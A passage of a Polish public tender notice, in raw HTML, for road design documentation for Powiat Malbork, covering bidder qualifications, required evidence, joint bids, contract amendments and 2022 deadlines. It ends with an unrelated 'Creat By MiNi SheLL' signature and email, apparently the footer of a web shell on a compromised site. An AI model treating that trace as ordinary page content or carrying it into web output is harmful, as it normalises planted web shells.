ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa, <br/>•	posiadającą co najmniej trzyletnie doświadczenie (licząc od dnia uzyskania uprawnień) w pracy na stanowisku projektanta robót drogowych,<br/>•	należąca na dzień składania ofert do izby gospodarczej.<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie dotyczące podstaw wykluczenia z udziału w postępowaniu.<br/><br/>Oświadczenie podmiotów udostępniających zasoby - nie podlegają wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Potwierdzenie spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej. <br/>Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	Wykonawca musi przedstawić wykaz usług tj. wykonanych dokumentacji projektowych, których przedmiotem były roboty budowlane. Wykonawca spełni warunek jeżeli wykaże, że projektował w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa związana z wykonaniem dokumentacji projektowych została wykonana, oraz z załączeniem dowodów określających czy ta usługa została wykonana należycie, w szczególności informacji o tym czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługa była wykonywana, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wykonawcy winni udokumentować TYLKO realizację usługi w zakresie: wykonywania dokumentacji projektowej w ramach:<br/>•	budowy/przebudowy/remontu drogi o nawierzchni bitumicznej o długości minimalnej nie mniej niż 1,5km<br/>•	budowy/przebudowy/remontu drogi w zakresie budowy chodnika o długości minimalnej nie mniej niż 0,5km.<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wymaga się, dysponowania:<br/>•	minimum jedną osobą na stanowisku projektanta,<br/>•	posiadającą uprawnienia budowlane do projektowania robót budowlanych w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa, <br/>•	posiadającą co najmniej trzyletnie doświadczenie (licząc od dnia uzyskania uprawnień) w pracy na stanowisku projektanta robót drogowych,<br/>•	należąca na dzień składania ofert do izby gospodarczej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Oświadczenie dotyczące podanych informacji.<br/><br/>Oświadczenie dotyczące wypełnienia obowiązków informacyjnych dotyczących RODO. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> •	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>•	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.<br/>•	Do oferty wspólnej wykonawcy dołączają pełnomocnictwo w oryginale w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym osoby/osób udzielającej/cych pełnomocnictwa, bądź kopii notarialnej, potwierdzonej za zgodność z oryginałem notarialnie w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym notariusza). <br/>•	Pełnomocnik pozostaje w kontakcie z zamawiającym w toku postępowania i do niego zamawiający kieruje informacje, korespondencję, itp.<br/>•	Oferta wspólna, składana przez dwóch lub więcej wykonawców, powinna spełniać następujące wymagania:<br/>	oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>	sposób składania dokumentów w ofercie wspólnej:<br/>a)	dokumenty wspólne takie jak np.: „Oferta” itp. składa pełnomocnik wykonawców w imieniu wszystkich wykonawców, składających ofertę wspólną;<br/>b)	kopie dokumentów dotyczących każdego z wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych wykonawców.<br/>•	Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną.<br/>•	Przed podpisaniem umowy (w przypadku wygrania postępowania) wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>	określenie zakresu działania poszczególnych stron umowy,<br/>	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)	Zamawiający wymaga aby wykonawca zawarł z nim umowę na warunkach określonych w Projekcie umowy stanowiącym załącznik nr 2 do SWZ.<br/>2)	Strony przed zawarciem umowy mogą uzupełnić lub zmodyfikować Projekt umowy w zakresie, który nie został określony w ofercie, np. kwestie organizacyjno-porządkowe.<br/>3)	Zamawiający nie dopuszcza istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z wyłączeniem okoliczności opisanych w Specyfikacji Warunków Zamówienia i w Projekcie umowy.<br/>4)	Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności.<br/>5)	Wszystkie zmiany i uzupełnienia treści umowy stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody i nie mogą być podstawą roszczenia wykonawcy o dokonanie zmian. <br/><br/><br/><br/>1.	Wszelkie zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności. Zakres zmian umowy zostanie uzgodniony przez Strony po otrzymaniu pisemnego wniosku wraz z jego uzasadnieniem. <br/>2.	Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeśli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną.<br/>3.	W związku z stanem „zagrożenia epidemicznego&#34; związanym z występowaniem zakażeń koronawirusem SARS–CoV–2 Zamawiający dopuszcza zmiany warunków umowy dotyczące terminu wykonania przedmiotu zamówienia o czas konieczny do usunięcia skutków związanych z występowaniem zakażeń tj.:<br/>a)	ograniczeniem lub wstrzymaniem świadczeń przez instytucje, urzędy itp. organy, które przyczyniłby się do opóźnień w uzyskaniu warunków, uzgodnień, decyzji itp.<br/>b)	ograniczeniem lub brakiem dostępności jakichkolwiek materiałów niezbędnych do wykonywania przedmiotu zamówienia,<br/>c)	ograniczeniem lub wstrzymaniem świadczeń jakichkolwiek usług realizowanych przez podwykonawców,<br/>d)	nieobecnością pracowników, zleceniobiorców lub innych kontrahentów Wykonawcy za pomocą, których realizować miał on przedmiot umowy,<br/>e)	wydania wszelkiego rodzaju decyzji, innych wiążących rozstrzygnięć, bądź aktów prawnych przez władze lub organy władzy publicznej Rzeczpospolitej Polskiej, bądź wydania uregulowań prawnych przez Unie Europejską dotyczących ograniczeń w przemieszczaniu się ludzi, reglamentacji dóbr, zamknięcia zakładów pracy, zakazu eksportu lub wprowadzających jakiekolwiek inne ograniczenia wolności i praw człowieka i obywatela, które mogą mieć wpływ na realizację przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektroniczne składanie ofert: https://powiat-malbork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-27 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com